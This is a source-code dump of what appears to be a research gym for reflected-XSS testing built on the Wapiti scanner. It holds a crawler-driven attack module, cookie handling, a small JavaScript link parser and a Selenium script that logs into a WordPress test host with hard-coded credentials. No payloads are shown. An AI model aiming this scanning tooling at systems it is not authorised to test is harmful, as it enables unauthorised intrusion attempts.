106 |                       "while attempting to inject a payload in the parameter {0}")
107 | 
108 | 
109 | # The only reason those lines are here is to allow the translation script to find them
110 | ("Backup file description")
111 | ("Backup file solution")
112 | 
113 | ("Blind SQL Injection description")
114 | ("Blind SQL Injection solution")
115 | 
116 | ("Commands execution description")
117 | ("Commands execution solution")
118 | 
119 | ("CRLF description")
120 | ("CRLF solution")
121 | 
122 | ("Cross Site Scripting description")
123 | ("Cross Site Scripting solution")
124 | 
125 | ("File Handling description")
126 | ("File Handling solution")
127 | 
128 | ("Htaccess bypass description")
129 | ("Htaccess bypass solution")
130 | 
131 | ("Internal server error description")
132 | ("Internal server error solution")
133 | 
134 | ("Potentially dangerous file description")
135 | ("Potentially dangerous file solution")
136 | 
137 | ("Resource consumption description")
138 | ("Resource consumption solution")
139 | 
140 | ("SQL Injection description")
141 | ("SQL Injection solution")
142 | 
143 | ("Server Side Request Forgery description")
144 | ("Server Side Request Forgery solution")
145 | 
146 | ("Open Redirect description")
147 | ("Open Redirect solution")
148 | 
149 | ("XXE description")
150 | ("XXE solution")


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/main/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/main/__init__.py


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/main/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/main/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/main/__pycache__/attack_module.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/main/__pycache__/attack_module.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/main/attack_module.py:
--------------------------------------------------------------------------------
  1 | import sys
  2 | import argparse
  3 | import os
  4 | from urllib.parse import urlparse
  5 | from time import strftime, gmtime, sleep
  6 | from importlib import import_module
  7 | from operator import attrgetter
  8 | from traceback import print_tb
  9 | from collections import deque
 10 | from datetime import datetime
 11 | import logging
 12 | from uuid import uuid1
 13 | from colorama import Fore, Back, Style
 14 | from hashlib import md5
 15 | from random import choice
 16 | import requests
 17 | from requests.exceptions import RequestException, ConnectionError, Timeout, ChunkedEncodingError, ContentDecodingError
 18 | 
 19 | from gym_reflected_xss.attack_module.net import crawler, jsoncookie
 20 | from gym_reflected_xss.attack_module.net.web import Request
 21 | from gym_reflected_xss.attack_module.net.sqlite_persister import SqlitePersister
 22 | from gym_reflected_xss.attack_module.attack import attack
 23 | from gym_reflected_xss.attack_module.attack.attack import Attack
 24 | # from gym_reflected_xss.attack_module.language.language import _
 25 | 
 26 | WAPITI_VERSION = "Wapiti 3.0.3"
 27 | SCAN_FORCE_VALUES = {
 28 |     "paranoid": 1,
 29 |     "sneaky": 0.7,
 30 |     "polite": 0.5,
 31 |     "normal": 0.2,
 32 |     "aggressive": 0.06,
 33 |     "insane": 0  # Special value that won't be really used
 34 | }
 35 | 
 36 | class InvalidOptionValue(Exception):
 37 |     def __init__(self, opt_name, opt_value):
 38 |         self.opt_name = opt_name
 39 |         self.opt_value = opt_value
 40 | 
 41 |     def __str__(self):
 42 |         return ("Invalid argument for option {0} : {1}").format(self.opt_name, self.opt_value)
 43 | 
 44 | class AttackModule():
 45 |     # REPORT_DIR = "report"
 46 |     #HOME_DIR = os.getenv("HOME") or os.getenv("USERPROFILE")
 47 |     #COPY_REPORT_DIR = os.path.join(HOME_DIR, ".wapiti", "generated_report")
 48 |     
 49 |     def __init__(self, root_url):
 50 |         
 51 |         self.done = False
 52 | 
 53 |         self.target_url = root_url
 54 |         self.server = urlparse(root_url).netloc
 55 | 
 56 |         self.crawler = crawler.Crawler(root_url)
 57 |         self.crawler.scope = crawler.Scope.PUNK
 58 |         self._start_urls = deque([root_url])
 59 |         self.urls = []
 60 |         self.forms = []
 61 |         self.attacks = []
 62 |         
 63 |         self._history_file = os.path.join(
 64 |             SqlitePersister.CRAWLER_DATA_DIR,
 65 |             "{}_{}_{}.db".format(
 66 |                 self.server.replace(':', '_'),
 67 |                 self.crawler.scope,
 68 |                 md5(root_url.encode(errors="replace")).hexdigest()[:8]
 69 |             )
 70 |         )
 71 |         self.persister = SqlitePersister(self._history_file)
 72 |         self.color = 0
 73 |         self.verbose = 0
 74 |         self.module_options = None
 75 |         self.attack_options = {}
 76 |         self._excluded_urls = []
 77 |         self._bad_params = set()
 78 |         self._max_depth = 40
 79 |         self._max_links_per_page = -1
 80 |         self._max_files_per_dir = 0
 81 |         self._scan_force = "normal"
 82 |         self._max_scan_time = 0
 83 |         self._bug_report = True
 84 | 
 85 |         self.report_gen = None
 86 |         self.report_generator_type = "html"
 87 |         self.output_file = ""
 88 |     
 89 |     
 90 |     
 91 |     def browse(self):
 92 | 
 93 |         """Extract hyperlinks and forms from the webpages found on the website"""
 94 |         for resource in self.persister.get_to_browse():
 95 |             self._start_urls.append(resource)
 96 |         for resource in self.persister.get_links():
 97 |             self._excluded_urls.append(resource)
 98 |         for resource in self.persister.get_forms():
 99 |             self._excluded_urls.append(resource)
100 | 
101 |         stopped = False
102 | 
103 |         explorer = crawler.Explorer(self.crawler)
104 |         explorer.max_depth = self._max_depth
105 |         explorer.max_files_per_dir = self._max_files_per_dir
106 |         explorer.max_requests_per_depth = self._max_links_per_page
107 |         explorer.forbidden_parameters = self._bad_params
108 |         explorer.qs_limit = 1 #SCAN_FORCE_VALUES[self._scan_force]
109 |         explorer.verbose = (self.verbose > 0)
110 |         explorer.load_saved_state(self.persister.output_file[:-2] + "pkl")
111 | 
112 |         self.persister.set_root_url(self.target_url)
113 |         start = datetime.utcnow()
114 |         print(Fore.RED + "[*] Start Scanning...", end="\r")
115 |         try:
116 |             for resource in explorer.explore(self._start_urls, self._excluded_urls):
117 |                 # Browsed URLs are saved one at a time
118 |                 self.persister.add_request(resource)
119 |                 if (datetime.utcnow() - start).total_seconds() > self._max_scan_time >= 1:
120 |                     print(("Max scan time was reached, stopping."))
121 |                     break
122 |         except KeyboardInterrupt:
123 |             stopped = True
124 |         sys.stdout.write("\033[K")
125 |         print(Fore.GREEN + "[*] Scanning complete" + Fore.RESET)
126 |         print(("[*] Saving scan state, please wait..."))
127 | 
128 |         # Not yet scanned URLs are all saved in one single time (bulk insert + final commit)
129 |         self.persister.set_to_browse(self._start_urls)
130 |         # Let's save explorer values (limits)
131 |         explorer.save_state(self.persister.output_file[:-2] + "pkl")
132 | 
133 |         
134 |         # print((" Note"))
135 |         # print("========")
136 | 
137 |         # print(("This scan has been saved in the file {0}").format(self.persister.output_file))
138 |         if stopped:
139 |             print(("The scan will be resumed next time unless you pass the --skip-crawl option."))
140 | 
141 |     
142 | 
143 | 
144 |     def set_timeout(self, timeout: float = 6.0):
145 |         """Set the timeout for the time waiting for a HTTP response"""
146 |         self.crawler.timeout = timeout
147 | 
148 |     def set_verify_ssl(self, verify: bool = False):
149 |         """Set whether SSL must be verified."""
150 |         self.crawler.secure = verify
151 | 
152 |     def set_proxy(self, proxy: str = ""):
153 |         """Set a proxy to use for HTTP requests."""
154 |         self.crawler.set_proxy(proxy)
155 | 
156 |     def add_start_url(self, url: str):
157 |         """Specify an URL to start the scan with. Can be called several times."""
158 |         self._start_urls.append(url)
159 | 
160 |     def add_excluded_url(self, url_or_pattern: str):
161 |         """Specify an URL to exclude from the scan. Can be called several times."""
162 |         self._excluded_urls.append(url_or_pattern)
163 | 
164 |     def set_cookie_file(self, cookie: str):
165 |         """Load session data from a cookie file"""
166 |         if os.path.isfile(cookie):
167 |             jc = jsoncookie.JsonCookie()
168 |             jc.open(cookie)
169 |             cookiejar = jc.cookiejar(self.server)
170 |             jc.close()
171 |             self.crawler.session_cookies = cookiejar
172 | 
173 |     def set_auth_credentials(self, auth_basic: tuple):
174 |         """Set credentials to use if the website require an authentication."""
175 |         self.crawler.credentials = auth_basic
176 | 
177 |     def set_auth_type(self, auth_method: str):
178 |         """Set the authentication method to use."""
179 |         self.crawler.auth_method = auth_method
180 | 
181 |     def add_bad_param(self, param_name: str):
182 |         """Exclude a parameter from an url (urls with this parameter will be
183 |         modified. This function can be call several times"""
184 |         self._bad_params.add(param_name)
185 | 
186 |     def set_max_depth(self, limit: int):
187 |         """Set how deep the scanner should explore the website"""
188 |         self._max_depth = limit
189 | 
190 |     def set_max_links_per_page(self, limit: int):
191 |         self._max_links_per_page = limit
192 | 
193 |     def set_max_files_per_dir(self, limit: int):
194 |         self._max_files_per_dir = limit
195 | 
196 |     def set_scan_force(self, force: str):
197 |         self._scan_force = force
198 | 
199 |     def set_max_scan_time(self, minutes: float):
200 |         self._max_scan_time = minutes * 60
201 | 
202 |     def set_color(self):
203 |         """Put colors in the console output (terminal must support colors)"""
204 |         self.color = 1
205 | 
206 |     def verbosity(self, vb: int):
207 |         """Define the level of verbosity of the output."""
208 |         self.verbose = vb
209 | 
210 |     def set_bug_reporting(self, value: bool):
211 |         self._bug_report = value
212 | 
213 |     def set_attack_options(self, options: dict = None):
214 |         self.attack_options = options if isinstance(options, dict) else {}
215 | 
216 |     def set_modules(self, options=""):
217 |         """Activate or deactivate (default) all attacks"""
218 |         self.module_options = options
219 | 
220 |     def set_report_generator_type(self, report_type="xml"):
221 |         """Set the format of the generated report. Can be html, json, txt or xml"""
222 |         self.report_generator_type = report_type
223 | 
224 |     def set_output_file(self, output_file: str):
225 |         """Set the filename where the report will be written"""
226 |         self.output_file = output_file
227 | 
228 |     def add_custom_header(self, key: str, value: str):
229 |         self.crawler.add_custom_header(key, value)
230 | 
231 |     def flush_attacks(self):
232 |         self.persister.flush_attacks()
233 | 
234 |     def flush_session(self):
235 |         self.persister.close()
236 |         try:
237 |             os.unlink(self._history_file)
238 |         except FileNotFoundError:
239 |             pass
240 | 
241 |         try:
242 |             os.unlink(self.persister.output_file[:-2] + "pkl")
243 |         except FileNotFoundError:
244 |             pass
245 |         self.persister = SqlitePersister(self._history_file)
246 | 
247 |     def count_resources(self):
248 |         return self.persister.count_paths()
249 | 
250 |     def has_scan_started(self):
251 |         return self.persister.has_scan_started()
252 | 
253 |     def have_attacks_started(self):
254 |         return self.persister.have_attacks_started()
255 | 
256 | 
257 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/net/__init__.py


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/net/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/__pycache__/crawler.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/net/__pycache__/crawler.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/__pycache__/jsoncookie.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/net/__pycache__/jsoncookie.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/__pycache__/lamejs.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/net/__pycache__/lamejs.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/__pycache__/sqlite_persister.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/net/__pycache__/sqlite_persister.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/__pycache__/web.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/net/__pycache__/web.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/__pycache__/xss_utils.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/net/__pycache__/xss_utils.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/jsoncookie.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | # -*- coding: utf-8 -*-
  3 | # This file is part of the Wapiti project (http://wapiti.sourceforge.net)
  4 | # Copyright (C) 2012-2019 Nicolas Surribas
  5 | #
  6 | # This program is free software; you can redistribute it and/or modify
  7 | # it under the terms of the GNU General Public License as published by
  8 | # the Free Software Foundation; either version 2 of the License, or
  9 | # (at your option) any later version.
 10 | #
 11 | # This program is distributed in the hope that it will be useful,
 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 14 | # GNU General Public License for more details.
 15 | #
 16 | # You should have received a copy of the GNU General Public License
 17 | # along with this program; if not, write to the Free Software
 18 | # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 19 | import json
 20 | import re
 21 | from http.cookiejar import Cookie, CookieJar
 22 | 
 23 | from requests.cookies import RequestsCookieJar
 24 | 
 25 | # Regex to check whether the domain returned by CookieJar is an IP address
 26 | # IPv6 addresses seems to have a ".local" suffix.
 27 | IP_REGEX = re.compile(r"^(?P<ip>(\d+\.\d+\.\d+.\d+)|(\[([\da-f:]+)\])(\.local)?)(?P<port>:\d+)?$")
 28 | 
 29 | 
 30 | class JsonCookie:
 31 |     """This class allows to store (and load) cookies in a JSON formatted file."""
 32 | 
 33 |     def __init__(self):
 34 |         self.cookiedict = None
 35 |         self.fd = None
 36 | 
 37 |     # return a dictionary on success, None on failure
 38 |     def open(self, filename):
 39 |         if not filename:
 40 |             return None
 41 |         try:
 42 |             self.fd = open(filename, "r+")
 43 |             self.cookiedict = json.load(self.fd)
 44 |         except (IOError, ValueError):
 45 |             self.fd = open(filename, "w+")
 46 |             self.cookiedict = {}
 47 |         return self.cookiedict
 48 | 
 49 |     def addcookies(self, cookies):
 50 |         """Inject Cookies from a CookieJar into our JSON dictionary."""
 51 |         if not isinstance(cookies, RequestsCookieJar):
 52 |             return False
 53 | 
 54 |         for domain, pathdict in cookies._cookies.items():
 55 |             search_ip = IP_REGEX.match(domain)
 56 |             if search_ip:
 57 |                 # Match either an IPv4 address or an IPv6 address with a local suffix
 58 |                 domain_key = search_ip.group("ip")
 59 |             else:
 60 |                 domain_key = domain if domain[0] == '.' else '.' + domain
 61 | 
 62 |             if domain_key not in self.cookiedict.keys():
 63 |                 self.cookiedict[domain_key] = {}
 64 | 
 65 |             for path, keydict in pathdict.items():
 66 |                 if path not in self.cookiedict[domain_key].keys():
 67 |                     self.cookiedict[domain_key][path] = {}
 68 | 
 69 |                 for key, cookieobj in keydict.items():
 70 |                     if isinstance(cookieobj, Cookie):
 71 |                         print(cookieobj)
 72 |                         cookie_attrs = {
 73 |                             "value": cookieobj.value,
 74 |                             "expires": cookieobj.expires,
 75 |                             "secure": cookieobj.secure,
 76 |                             "port": cookieobj.port,
 77 |                             "version": cookieobj.version
 78 |                         }
 79 |                         self.cookiedict[domain_key][path][key] = cookie_attrs
 80 | 
 81 |     def cookiejar(self, domain):
 82 |         """Returns a cookielib.CookieJar object containing cookies matching the given domain."""
 83 |         cj = CookieJar()
 84 | 
 85 |         if not domain:
 86 |             return cj
 87 | 
 88 |         # Domain comes from a urlparse().netloc so we must take care of optional port number
 89 |         search_ip = IP_REGEX.match(domain)
 90 |         if search_ip:
 91 |             # IPv4 (ex: '127.0.0.1') or IPv6 (ex: '[::1]') address.
 92 |             # We must append the '.local' suffix pour IPv6 addresses.
 93 |             domain = search_ip.group("ip")
 94 |             if domain.startswith("[") and not domain.endswith(".local"):
 95 |                 domain += ".local"
 96 |             matching_domains = [domain]
 97 |         else:
 98 |             domain = domain.split(":")[0]
 99 | 
100 |             # For hostnames on local network we must add a 'local' tld (needed by cookielib)
101 |             if '.' not in domain:
102 |                 domain += ".local"
103 | 
104 |             domain_key = domain if domain[0] == '.' else '.' + domain
105 |             exploded = domain_key.split(".")
106 |             parent_domains = [".%s" % (".".join(exploded[x:])) for x in range(1, len(exploded) - 1)]
107 |             matching_domains = [d for d in parent_domains if d in self.cookiedict]
108 | 
109 |         if not matching_domains:
110 |             return cj
111 | 
112 |         for d in matching_domains:
113 |             for path in self.cookiedict[d]:
114 |                 for cookie_name, cookie_attrs in self.cookiedict[d][path].items():
115 |                     ck = Cookie(
116 |                         version=cookie_attrs["version"],
117 |                         name=cookie_name,
118 |                         value=cookie_attrs["value"],
119 |                         port=None,
120 |                         port_specified=False,
121 |                         domain=d,
122 |                         domain_specified=True,
123 |                         domain_initial_dot=False,
124 |                         path=path,
125 |                         path_specified=True,
126 |                         secure=cookie_attrs["secure"],
127 |                         expires=cookie_attrs["expires"],
128 |                         discard=True,
129 |                         comment=None,
130 |                         comment_url=None,
131 |                         rest={'HttpOnly': None},
132 |                         rfc2109=False
133 |                     )
134 | 
135 |                     if cookie_attrs["port"]:
136 |                         ck.port = cookie_attrs["port"]
137 |                         ck.port_specified = True
138 | 
139 |                     cj.set_cookie(ck)
140 |         return cj
141 | 
142 |     def delete(self, domain, path=None, key=None):
143 |         if not domain:
144 |             return False
145 | 
146 |         search_ip = IP_REGEX.match(domain)
147 |         if search_ip:
148 |             # IPv4 (ex: '127.0.0.1') or IPv6 (ex: '[::1]') address
149 |             # We must append the '.local' suffix pour IPv6 addresses.
150 |             domain = search_ip.group("ip")
151 |             if domain.startswith("[") and not domain.endswith(".local"):
152 |                 domain += ".local"
153 |         else:
154 |             domain = domain.split(":")[0]
155 |             # For hostnames on local network we must add a 'local' tld (needed by cookielib)
156 |             if '.' not in domain:
157 |                 domain += ".local"
158 |             domain = domain if domain[0] == '.' else '.' + domain
159 | 
160 |         if domain not in self.cookiedict.keys():
161 |             return False
162 | 
163 |         if not path:
164 |             # delete whole domain data
165 |             self.cookiedict.pop(domain)
166 |             return True
167 | 
168 |         # path asked for deletion... but does not exist
169 |         if path not in self.cookiedict[domain].keys():
170 |             return False
171 | 
172 |         if not key:
173 |             # remove every data on the specified domain for the matching path
174 |             self.cookiedict[domain].pop(path)
175 |             return True
176 | 
177 |         if key in self.cookiedict[domain][path].keys():
178 |             self.cookiedict[domain][path].pop(key)
179 |             return True
180 |         return False
181 | 
182 |     def dump(self):
183 |         if not self.fd:
184 |             return False
185 |         self.fd.seek(0)
186 |         self.fd.truncate()
187 |         json.dump(self.cookiedict, self.fd, indent=2)
188 |         return True
189 | 
190 |     def close(self):
191 |         self.fd.close()
192 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/jsparser/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/net/jsparser/__init__.py


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/jsparser/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/net/jsparser/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/jsparser/__pycache__/jsparser3.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/net/jsparser/__pycache__/jsparser3.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/lamejs.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | # -*- coding: utf-8 -*-
  3 | # LameJs - A very basic javascript interpreter in Python
  4 | # This file is part of the Wapiti project (http://wapiti.sourceforge.io)
  5 | # Copyright (C) 2013-2020 Nicolas Surribas
  6 | #
  7 | # This program is free software; you can redistribute it and/or modify
  8 | # it under the terms of the GNU General Public License as published by
  9 | # the Free Software Foundation; either version 2 of the License, or
 10 | # (at your option) any later version.
 11 | #
 12 | # This program is distributed in the hope that it will be useful,
 13 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
 14 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 15 | # GNU General Public License for more details.
 16 | #
 17 | # You should have received a copy of the GNU General Public License
 18 | # along with this program; if not, write to the Free Software
 19 | # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 20 | import logging
 21 | import re
 22 | 
 23 | from gym_reflected_xss.attack_module.net.jsparser import jsparser3
 24 | 
 25 | 
 26 | class LameJs:
 27 | 
 28 |     def __init__(self, data):
 29 |         self.js_vars = {}
 30 |         self.links = []
 31 |         self.debug = False
 32 |         # https://stackoverflow.com/questions/5780047/html-comments-in-a-javascript-block
 33 |         # trick used by http://php.testsparker.com/
 34 |         data = re.sub(r"(?m)^[^\S\n]*<!--", "//", data)
 35 |         data = re.sub(r"(?m)^[^\S\n]*--", "//", data)
 36 |         try:
 37 |             self.js_vars = {}
 38 |             self.links = []
 39 |             rootnode = jsparser3.parse(data, None, 0)
 40 |             self.read_node(rootnode)
 41 |         except Exception:
 42 |             pass
 43 | 
 44 |     def get_vars(self):
 45 |         return self.js_vars
 46 | 
 47 |     def get_links(self):
 48 |         return self.links
 49 | 
 50 |     def read_node(self, node):
 51 |         if node.type == "SCRIPT":
 52 |             logging.debug("# SCRIPT")
 53 |             for sub_node in node:
 54 |                 self.read_node(sub_node)
 55 |         elif node.type == "VAR":
 56 |             logging.debug("# VAR IN")
 57 |             logging.debug("# VAR OUT {}".format(self.read_node(node[0])))
 58 |         elif node.type == "IDENTIFIER":
 59 |             logging.debug("# IDENTIFIER")
 60 |             if hasattr(node, 'initializer'):
 61 |                 value = self.read_node(node.initializer)
 62 |                 self.js_vars[node.value] = value
 63 |                 return node.value, value
 64 |             else:
 65 |                 return self.js_vars.get(node.value)
 66 |         elif node.type == "NUMBER":
 67 |             logging.debug("# NUMBER")
 68 |             return node.value
 69 |         elif node.type == "STRING":
 70 |             logging.debug("# STRING")
 71 |             return node.value
 72 |         elif node.type == "PLUS":
 73 |             logging.debug("# PLUS")
 74 |             eax = None
 75 |             # It some items of concatenation includes function calls or accessing parts of array, stop here to prevent
 76 |             # false positives
 77 |             if set([sub_node.type for sub_node in node]) & {"CALL", "INDEX"}:
 78 |                 return None
 79 | 
 80 |             for sub_node in node:
 81 |                 value = self.read_node(sub_node)
 82 |                 if eax is None:
 83 |                     eax = value
 84 |                 else:
 85 |                     if isinstance(eax, str):
 86 |                         if isinstance(value, str):
 87 |                             eax += value
 88 |                         elif isinstance(value, int):
 89 |                             eax += str(value)
 90 |                     elif isinstance(eax, int):
 91 |                         if isinstance(value, str):
 92 |                             eax = str(eax) + value
 93 |                         elif isinstance(value, int):
 94 |                             eax += value
 95 | 
 96 |             return eax
 97 |         elif node.type == "FUNCTION":
 98 |             logging.debug("# FUNCTION")
 99 |             try:
100 |                 func_name = node.name
101 |             except AttributeError:
102 |                 func_name = "anonymous"
103 |             logging.debug("In function {0}".format(func_name))
104 |             self.read_node(node.body)
105 |         elif node.type == "SEMICOLON":
106 |             logging.debug("# SEMICOLON")
107 |             self.read_node(node.expression)
108 |             logging.debug("Semicolon end")
109 |         elif node.type == "CALL":
110 |             logging.debug("# CALL")
111 |             func_name = self.read_node(node[0])
112 |             if not func_name:
113 |                 func_name = "anonymous"
114 |             params = self.read_node(node[1])
115 |             logging.debug("func_name = {0}".format(func_name))
116 |             logging.debug("params = {0}".format(params))
117 |             if func_name == "window.open":
118 |                 if len(params) and params[0]:
119 |                     self.links.append(params[0])
120 |             elif func_name.endswith(".asyncRequest"):
121 |                 if len(params) > 1:
122 |                     if params[0].upper() in ["GET", "POST"]:
123 |                         self.links.append(params[1])
124 |         elif node.type == "DOT":
125 |             logging.debug("# DOT")
126 |             return ".".join([sub_node.value for sub_node in node])
127 |         elif node.type == "LIST":
128 |             logging.debug("# LIST")
129 |             ll = []
130 |             for sub_node in node:
131 |                 ll.append(self.read_node(sub_node))
132 |             logging.debug("list = {0}".format(ll))
133 |             return ll
134 |         elif node.type == "ASSIGN":
135 |             logging.debug("# ASSIGN")
136 |             left_value = self.read_node(node[0])
137 |             if node[1].type != "DOT":
138 |                 # Seems too complicated to process objects attributes...
139 |                 right_value = self.read_node(node[1])
140 |                 logging.debug("left_value = {0}".format(left_value))
141 |                 logging.debug("right_value = {0}".format(right_value))
142 |                 if right_value and (
143 |                     left_value.endswith(".href") or
144 |                     left_value.endswith(".action") or
145 |                     left_value.endswith(".location") or
146 |                     left_value.endswith(".src")
147 |                 ):
148 |                     if node[1].type == "IDENTIFIER" and self.js_vars.get(right_value):
149 |                         self.links.append(self.js_vars[right_value])
150 |                     else:
151 |                         self.links.append(right_value)
152 |         elif node.type == "WITH":
153 |             logging.debug("# WITH")
154 |             for sub_node in node.body:
155 |                 self.read_node(sub_node)
156 |         elif node.type == "PROPERTY_INIT":
157 |             logging.debug("# PROPERTY_INIT")
158 |             attrib_name = self.read_node(node[0])
159 |             attrib_value = self.read_node(node[1])
160 |             logging.debug("attrib_name = {0}".format(attrib_name))
161 |             logging.debug("attrib_value = {0}".format(attrib_value))
162 |             return attrib_name
163 |         elif node.type == "OBJECT_INIT":
164 |             logging.debug("# OBJECT_INIT")
165 |             for sub_node in node:
166 |                 self.read_node(sub_node)
167 |             logging.debug("OBJECT_INIT end")
168 |         elif node == "REGEXP":
169 |             logging.debug("# REGEXP")
170 |             return node.value
171 |         elif node == "THIS":
172 |             logging.debug("# THIS")
173 |             return "this"
174 |         else:
175 |             logging.debug("? {}".format(node.type))
176 | 
177 | 
178 | if __name__ == "__main__":
179 |     logging.basicConfig(level=logging.DEBUG)
180 | 
181 |     data3 = """
182 |     function yolo() {
183 |       u='http://www.website.com/page.php?uid=1';
184 |       t='Hi there';
185 |       window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');
186 |       return false;
187 |     }"""
188 | 
189 |     lame_js = LameJs(data3)
190 |     print(lame_js.get_links())
191 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/login.py:
--------------------------------------------------------------------------------
 1 | from selenium import webdriver
 2 | 
 3 | driver = webdriver.Chrome('../../../chromedriver')
 4 | driver.implicitly_wait(3)
 5 | 
 6 | driver.get('http://143.248.247.127:8001/wordpress/wp-login.php?redirect_to=http%3A%2F%2F143.248.247.127%3A8001%2Fwordpress%2Fwp-admin%2F&reauth=1')
 7 | print(driver.page_source)
 8 | driver.find_element_by_name('log').send_keys('test@test.test')
 9 | driver.find_element_by_name('pwd').send_keys('test')
10 | driver.find_element_by_name("wp-submit").click()
11 | """driver.get('https://order.pay.naver.com/home') ## Naver 페이 들어가기
12 | html = driver.page_source ## 페이지의 elements모두 가져오기
13 | soup = BeautifulSoup(html, 'html.parser') ## BeautifulSoup사용하기
14 | notices = soup.select('div.p_inr > div.p_info > a > span')"""


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/login_urls.txt:
--------------------------------------------------------------------------------
1 | http://143.248.247.127:8001/wordpress/wp-admin/
2 | /cmsimple/ login=true&selected=MISSING_HEADING&passwd=test


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/sqlite_persister.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | # -*- coding: utf-8 -*-
  3 | # This file is part of the Wapiti project (http://wapiti.sourceforge.net)
  4 | # Copyright (C) 2017-2019 Nicolas Surribas
  5 | #
  6 | # This program is free software; you can redistribute it and/or modify
  7 | # it under the terms of the GNU General Public License as published by
  8 | # the Free Software Foundation; either version 2 of the License, or
  9 | # (at your option) any later version.
 10 | #
 11 | # This program is distributed in the hope that it will be useful,
 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 14 | # GNU General Public License for more details.
 15 | #
 16 | # You should have received a copy of the GNU General Public License
 17 | # along with this program; if not, write to the Free Software
 18 | # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 19 | import os
 20 | import json
 21 | import sqlite3
 22 | from collections import namedtuple
 23 | 
 24 | from . import web
 25 | 
 26 | 
 27 | Payload = namedtuple("Payload", "evil_request,original_request,category,level,parameter,info,type")
 28 | 
 29 | 
 30 | class SqlitePersister:
 31 |     """This class makes the persistence tasks for persisting the crawler parameters
 32 |     in other to can continue the process in the future.
 33 |     """
 34 | 
 35 |     CRAWLER_DATA_DIR_NAME = "scans"
